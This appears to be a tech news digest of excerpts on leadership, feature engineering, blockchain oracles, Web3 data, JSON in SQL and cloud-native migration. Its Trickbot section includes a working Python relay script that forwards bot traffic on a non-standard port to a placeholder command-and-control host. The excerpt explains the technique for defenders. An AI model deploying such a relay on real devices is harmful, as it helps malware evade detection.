10 hard truths of change management
“We do a terrible job of understanding and navigating the emotional journey of
change,” says Wanda Wallace, leadership coach and managing partner of Leadership
Forum. “This is where leaders need to get smart.” While some people may welcome
it, “change is also about loss: loss of my current capabilities while I learn new
ones, loss of who I go to to solve a problem, loss of established ways of doing
things,” says Wallace. “Even if someone loves the rationale for the change, they
still have to grieve the loss of what was and the loss of the ease of knowing
what to do even if it wasn’t efficient.” It also involves fear. “This is usually
labelled as ‘resistance,’ but I find many times it is fear of not being able to
learn the new skills, not being as valued after the change, not feeling
competent, not being at the center of activity the way they were before the
change,” says Wallace. She advises IT leaders to name those fears, acknowledge
them, and talk about the journey of learning — not just from the C-suite, but at
the manager level.
Feature Engineering for Machine Learning (1/3)
During EDA, one of the first steps should be to check for and remove constant
features. But surely the model can discover that on its own? Yes and no.
Consider a linear regression model in which a non-zero weight has been learned
for a constant feature. That term then serves as a second ‘bias’ term and seems
harmless enough … but not if that ‘constant’ feature was constant only in our
training data and (unbeknownst to us) takes on a different value in our
production/test data. Another thing to be on the lookout for is duplicated
features. This may not be blatantly obvious with categorical data, as it can
manifest as different label names being assigned to the same attribute across
different columns, e.g., one feature uses ‘XYZ’ to denote a categorical class
that another feature denotes as ‘ABC’, perhaps because the columns were culled
from different databases or departments. pd.factorize() can help identify
whether two features are synonymous.
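As a concrete illustration, here is a minimal pandas sketch of both checks; the DataFrame and column names are hypothetical:

```python
import pandas as pd

# Hypothetical frame: 'dept_a' and 'dept_b' use different labels
# ('XYZ' vs 'ABC') for the same underlying attribute.
df = pd.DataFrame({
    "const_col": [1, 1, 1, 1],
    "dept_a": ["XYZ", "XYZ", "QRS", "XYZ"],
    "dept_b": ["ABC", "ABC", "DEF", "ABC"],
})

# 1. Constant features: a single unique value across the training data.
constant_cols = [c for c in df.columns if df[c].nunique(dropna=False) <= 1]
print("constant:", constant_cols)  # ['const_col']

# 2. Synonymous categoricals: factorize each column so labels become
#    integer codes; identical code sequences mean two columns carry the
#    same information under different label names.
codes = {c: pd.factorize(df[c])[0].tolist() for c in df.select_dtypes("object")}
cols = list(codes)
duplicates = [(a, b) for i, a in enumerate(cols) for b in cols[i + 1:]
              if codes[a] == codes[b]]
print("synonymous:", duplicates)  # [('dept_a', 'dept_b')]
```

Note that the factorize check compares the pattern of codes, not the labels themselves, which is exactly what makes it useful when two departments named the same categories differently.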
OpenAI’s Chief Scientist Claimed AI May Be Conscious — and Kicked Off a Furious Debate
Consciousness is at times mentioned in conversations about AI. Although it is
inseparable from intelligence in humans, it isn’t clear whether the same holds
for machines. Those who dislike AI anthropomorphization often attack the notion
of “machine intelligence.” Consciousness, being even more abstract, usually
comes off worse. And rightly so, as consciousness, not unlike intelligence, is
a fuzzy concept that lives in the blurred intersection of philosophy and the
cognitive sciences. The origins of the modern concept can be traced back to
John Locke, who described it as “the perception of what passes in a man’s own
mind.” Even so, it has proved to be an elusive concept. Multiple models and
hypotheses of consciousness have attracted varying degrees of interest over the
years, but the scientific community has not yet arrived at a consensus
definition. For instance, panpsychism, which comes to mind when reading
Sutskever’s remarks, is a singular idea that has gained some traction recently.
Cryptographic Truth: The Future of Trust-Minimized Computing and Record-Keeping
The focus of this article so far has been on how blockchains combine
cryptography and game theory to consistently form honest consensus—the
truth—regarding the validity of internal transactions. However, how can events
happening outside a blockchain be reliably verified? Enter Chainlink. Chainlink
is a decentralized oracle network designed to generate truth about external data
and off-chain computation. In this sense, Chainlink generates truth from largely
non-deterministic environments. Determinism is a feature of computation where a
specific input will always lead to a specific output, i.e., code will execute
exactly as written. Decentralized blockchains are said to be deterministic
because they employ trust-minimization techniques that remove, or reduce to a
near-statistical impossibility, any variables that could inhibit internal
transaction submission, execution, and verification. The challenge with
non-deterministic
environments is that the truth can be subjective, difficult to obtain, or
expensive to verify.
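To make the distinction concrete, here is a toy Python sketch (purely illustrative, not Chainlink code) contrasting a deterministic function with one whose output depends on its environment:

```python
import random
import time

# Deterministic, like on-chain execution: the same input always yields
# the same output, so any node can re-run it and verify the result.
def settle(balance: int, amount: int) -> int:
    return balance - amount

# Non-deterministic: the output depends on state outside the code (the
# clock, randomness, a remote feed). This stands in for the external
# data an oracle network must turn into a single agreed-upon value.
def spot_price() -> float:
    random.seed(time.time_ns())
    return 100.0 + random.uniform(-1.0, 1.0)

assert settle(10, 3) == settle(10, 3)  # always holds
print(spot_price(), spot_price())      # two calls, two different answers
```

A blockchain can verify settle-style logic by re-execution; it cannot re-execute spot_price-style observations, which is the gap an oracle network fills.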
Red Hat cloud leader defects to service mesh upstart
When service mesh first came out, Kubernetes was in such a fervor -- it had been
three or four years, so people had gone through the high of it, and saw the
potential, and then there was a little bit of a lull in the hype when it hadn't
really exploded in terms of usage. So when service mesh came out, for certain
people, it was just like, 'Oh, cool, here's the new thing.' And it was new, 1.0
sort of stuff. If you fast forward, now, four years from that, Kubernetes is now
at the point where it's super stable, it's being released less often. You have a
lot more companies who are deploying Kubernetes [that are] starting to build new
applications. We saw a lot of companies [during] the pandemic build new
applications at a faster rate than they did before. [Solo.io customer]
Chick-fil-A is an example -- at their thousands of stores as a franchise,
before, most people parked their car, went in the store, then came out.
Nowadays, the first interaction everybody has with the store is, 'I go on the
app, I place my order, I get my loyalty points.'
Ceramic’s Web3 Composability Resurrects Web 2.0 Mashups
One of the more interesting composability projects to emerge in Web3 is Ceramic,
which calls itself “a decentralized data network that brings unlimited data
composability to Web3 applications.” It’s basically a data conduit between dApps
(decentralized applications), blockchains, and the various flavors of
decentralized storage. The idea is that a dApp developer can use Ceramic to
manage “streams” of data, which can then be re-used or re-purposed by other
dApps via an open API. Unlike most blockchains, Ceramic is also able to easily
scale. A blog post on the Ceramic website explains that “each Ceramic node acts
as an individual execution environment for performing computations and
validating transactions on streams – there is no global ledger.” Also noteworthy
about Ceramic is its use of DIDs (Decentralized Identifiers), a W3C web standard
for authentication that I wrote about last year. The DID standard allows Ceramic
users to transact with streams using decentralized identities.
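Ceramic’s first-party clients are JavaScript, but each node also exposes an HTTP API. As a rough sketch, assuming a local daemon on its default port (7007) and the v0 streams endpoint, reading a stream’s current state from Python might look like this (the stream ID is a placeholder):

```python
import requests

# Assumptions: a Ceramic daemon running locally on its default port (7007)
# exposing the v0 HTTP API; the stream ID below is a placeholder.
CERAMIC_API = "http://localhost:7007/api/v0"
STREAM_ID = "kjzl6example..."  # hypothetical StreamID

resp = requests.get(f"{CERAMIC_API}/streams/{STREAM_ID}", timeout=10)
resp.raise_for_status()
stream = resp.json()

# The response carries the stream's current state, including its latest
# content, which other dApps can re-use or re-purpose via the same API.
print(stream["state"]["content"])
```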
Uncovering Trickbot’s use of IoT devices in command-and-control infrastructure
A significant part of its evolution also includes making its attacks and
infrastructure more durable against detection, including continuously improving
its persistence capabilities, evading researchers and reverse engineering, and
finding new ways to maintain the stability of its command-and-control (C2)
framework. This continuous evolution has seen Trickbot expand its reach from
computers to Internet of Things (IoT) devices such as routers, with the malware
updating its C2 infrastructure to utilize MikroTik devices and modules. MikroTik
routers are widely used around the world across different industries. By using
MikroTik routers as proxy servers for its C2 servers and redirecting the traffic
through non-standard ports, Trickbot adds another persistence layer that helps
malicious IPs evade detection by standard security systems. The Microsoft
Defender for IoT research team has recently discovered the exact method through
which MikroTik devices are used in Trickbot’s C2 infrastructure.
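The proxying itself is conceptually simple. The sketch below is not Trickbot code, just a minimal Python illustration of how a compromised device can relay bot traffic on a non-standard port to a hidden C2 server (the upstream address is a placeholder; 449 is a port cited in public Trickbot reporting):

```python
import socket
import threading

# Conceptual sketch only, not Trickbot code: how a compromised router can
# act as a dumb TCP relay, accepting bot traffic on a non-standard port
# and forwarding it to the real C2 server, so the C2 address never shows
# up in the victim's outbound traffic.
LISTEN_PORT = 449                        # non-standard port cited in reporting
UPSTREAM = ("c2.example.invalid", 443)   # placeholder C2 endpoint

def pipe(src: socket.socket, dst: socket.socket) -> None:
    # Copy bytes one way until the sender closes its side.
    while chunk := src.recv(4096):
        dst.sendall(chunk)

def serve() -> None:
    with socket.create_server(("", LISTEN_PORT)) as srv:
        while True:
            client, _ = srv.accept()
            upstream = socket.create_connection(UPSTREAM)
            # Relay both directions; to the C2 server the connection
            # appears to originate from the router, not the bot.
            threading.Thread(target=pipe, args=(client, upstream), daemon=True).start()
            threading.Thread(target=pipe, args=(upstream, client), daemon=True).start()

if __name__ == "__main__":
    serve()
```

Security tooling that trusts router-originated traffic, or that only inspects well-known ports, tends to miss this extra hop, which is the evasion the article describes.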
Why (and How) You Should Manage JSON with SQL
JSON documents can be large, with values spread across several tables in your
relational database. This can make creating and consuming JSON-based APIs
challenging, because you may need to combine data from several tables to form
a response. When consuming a service API, you have the opposite problem:
splitting a large JSON document into the appropriate tables. Using
custom-written code to map these elements in the application tier is tedious.
Such custom code, unless super-carefully constructed by someone who knows how
databases work, can also lead to many roundtrips to the database service,
slowing the application to a crawl and potentially consuming excess bandwidth.
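Modern SQL databases can do that mapping in a single query. As a minimal sketch, assuming an SQLite build with the built-in JSON functions (the article’s point applies to other SQL databases too; the schema here is hypothetical):

```python
import sqlite3

# Hypothetical schema: one order with many line items, assembled into a
# single nested JSON document in one query instead of N+1 roundtrips.
db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE orders(id INTEGER PRIMARY KEY, customer TEXT);
    CREATE TABLE items(order_id INTEGER, sku TEXT, qty INTEGER);
    INSERT INTO orders VALUES (1, 'Acme');
    INSERT INTO items VALUES (1, 'A-100', 2), (1, 'B-200', 5);
""")

row = db.execute("""
    SELECT json_object(
        'id', o.id,
        'customer', o.customer,
        'items', json_group_array(json_object('sku', i.sku, 'qty', i.qty))
    )
    FROM orders o JOIN items i ON i.order_id = o.id
    WHERE o.id = 1
    GROUP BY o.id
""").fetchone()

print(row[0])
# {"id":1,"customer":"Acme","items":[{"sku":"A-100","qty":2},{"sku":"B-200","qty":5}]}
```

One query, one roundtrip, and the nesting logic lives next to the data instead of in hand-rolled application-tier mapping code.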
... The free-form nature of JSON is both its biggest strength and its biggest
weakness. Once you start storing JSON documents in your database, it’s easy to
lose track of what their structure is. The only way to know the structure of a
document is to query its attributes. The JSON Data Guide is a function that
solves this problem for you.
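JSON Data Guide is Oracle’s feature for this. As a rough analog of what it does, the sketch below uses SQLite’s json_tree() to enumerate the paths and types actually present in stored documents, which is the kind of schema summary a data guide surfaces:

```python
import sqlite3

# Rough analog of a data guide: list every path/type that actually occurs
# in stored JSON documents. (Oracle's JSON_DATAGUIDE does this natively;
# here we approximate it with SQLite's json_tree().)
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE docs(body TEXT)")
db.execute("""INSERT INTO docs VALUES ('{"a": 1, "b": {"c": "x"}}')""")
db.execute("""INSERT INTO docs VALUES ('{"a": "oops", "d": [1, 2]}')""")

paths = db.execute("""
    SELECT DISTINCT t.fullkey, t.type
    FROM docs, json_tree(docs.body) AS t
    WHERE t.type NOT IN ('object', 'array')
    ORDER BY t.fullkey
""").fetchall()

for fullkey, typ in paths:
    print(fullkey, typ)
# $.a integer   <- the same path appears with two types: a schema-drift
# $.a text      <- signal a data guide would surface
# $.b.c text
# $.d[0] integer
# $.d[1] integer
```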
The new CEO: Chief Empathy Officer
Top leadership has historically been responsible only for numbers and the bottom
line. Profitability and utilization numbers are still important, but they
generally do not motivate employees outside of the leadership, shareholders, and
the board. Similarly, the feelings and well-being of the staff have long been
the primary responsibility of the HR team. This division of responsibility no
longer works in a company that wants to grow sustainably. The “Great
Resignation” indicates that well-being has taken on a new level of critical
importance. Arguably, a key contributor to this phenomenon has been employees’
lack of emotional connection to their employers. How can leaders help people
feel connected to the organization when they are physically separated? Empathy
is the answer. An empathetic leader’s understanding bridges those gaps and is a
key component in communicating the personal role each person plays in the
company’s strategy. In short, empathy is
not just a tactic. Genuine concern for people is the ultimate business strategy
for growth.
Four key considerations when moving from legacy to cloud-native
The Cloud Native Computing Foundation (CNCF) defines cloud-native as “scalable
applications in modern, dynamic environments such as public, private, and
hybrid clouds”, characterised by “containers, service meshes, microservices,
immutable infrastructure, and declarative APIs.” However, cloud-native
computing is more than just running software or infrastructure on the cloud:
cloud-only services still require constant tweaking whenever you deploy
applications. With cloud-native technology, however, your applications run on
stateless servers and immutable infrastructure that doesn’t require constant
modification. In the 2020 CNCF survey, 51% of respondents cited improved
scalability, shorter deployment time, and consistent availability as the top
benefits of using cloud-native technology in their projects. Furthermore,
Gartner projects that more than 45% of IT spending will be reallocated from
legacy systems to cloud solutions by 2024.
Quote for the day:
"Leaders are people who believe so passionately that they can seduce other people into sharing their dream." -- Warren G. Bennis